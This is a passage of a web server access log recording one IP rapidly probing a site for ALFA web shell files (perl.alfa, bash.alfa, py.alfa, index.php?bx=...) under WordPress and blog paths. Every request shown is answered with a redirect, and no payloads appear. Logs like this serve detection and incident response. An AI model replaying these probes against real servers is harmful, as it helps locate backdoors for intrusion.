[12/Aug/2025:12:03:30 -0400] "GET /images/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:34 -0400] "POST /images/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:34 -0400] "POST /images/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:34 -0400] "POST /images/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:34 -0400] "POST /images/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:35 -0400] "POST /images/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:35 -0400] "POST /images/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:35 -0400] "GET /images/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:35 -0400] "GET /images/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:35 -0400] "GET /images/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:37 -0400] "POST /components/alfacgiapi/perl.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:37 -0400] "POST /components/alfacgiapi/perl.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:37 -0400] "POST /components/alfacgiapi/bash.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:37 -0400] "POST /components/alfacgiapi/bash.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:37 -0400] "POST /components/alfacgiapi/py.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:38 -0400] "POST /components/alfacgiapi/py.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:38 -0400] "GET /components/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:38 -0400] "GET /components/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:38 -0400] "GET /components/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:39 -0400] "POST /components/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "POST /components/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "POST /components/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "POST /components/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "POST /components/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "POST /components/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:40 -0400] "GET /components/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:41 -0400] "GET /components/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:41 -0400] "GET /components/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:49 -0400] "POST /wordpress/alfacgiapi/perl.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:49 -0400] "POST /wordpress/alfacgiapi/perl.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "POST /wordpress/alfacgiapi/bash.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "POST /wordpress/alfacgiapi/bash.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "POST /wordpress/alfacgiapi/py.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "POST /wordpress/alfacgiapi/py.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "GET /wordpress/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:50 -0400] "GET /wordpress/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:51 -0400] "GET /wordpress/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:53 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:53 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:53 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "POST /wordpress/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "GET /wordpress/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "GET /wordpress/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:54 -0400] "GET /wordpress/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/perl.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/perl.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/bash.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/bash.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/py.alfa HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:57 -0400] "POST /wp/alfacgiapi/py.alfa HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:58 -0400] "GET /wp/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:58 -0400] "GET /wp/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:58 -0400] "GET /wp/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:02 -0400] "POST /wp/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:02 -0400] "POST /wp/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:02 -0400] "POST /wp/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:02 -0400] "POST /wp/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:02 -0400] "POST /wp/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:03 -0400] "POST /wp/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:03 -0400] "GET /wp/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:03 -0400] "GET /wp/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:03 -0400] "GET /wp/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:10 -0400] "POST /blog/alfacgiapi/perl.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "POST /blog/alfacgiapi/perl.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "POST /blog/alfacgiapi/bash.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "POST /blog/alfacgiapi/bash.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "POST /blog/alfacgiapi/py.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "POST /blog/alfacgiapi/py.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "GET /blog/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:11 -0400] "GET /blog/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:12 -0400] "GET /blog/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:16 -0400] "POST /blog/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:16 -0400] "POST /blog/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:16 -0400] "POST /blog/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:17 -0400] "POST /blog/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:17 -0400] "POST /blog/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:17 -0400] "POST /blog/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:17 -0400] "GET /blog/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:17 -0400] "GET /blog/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:18 -0400] "GET /blog/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 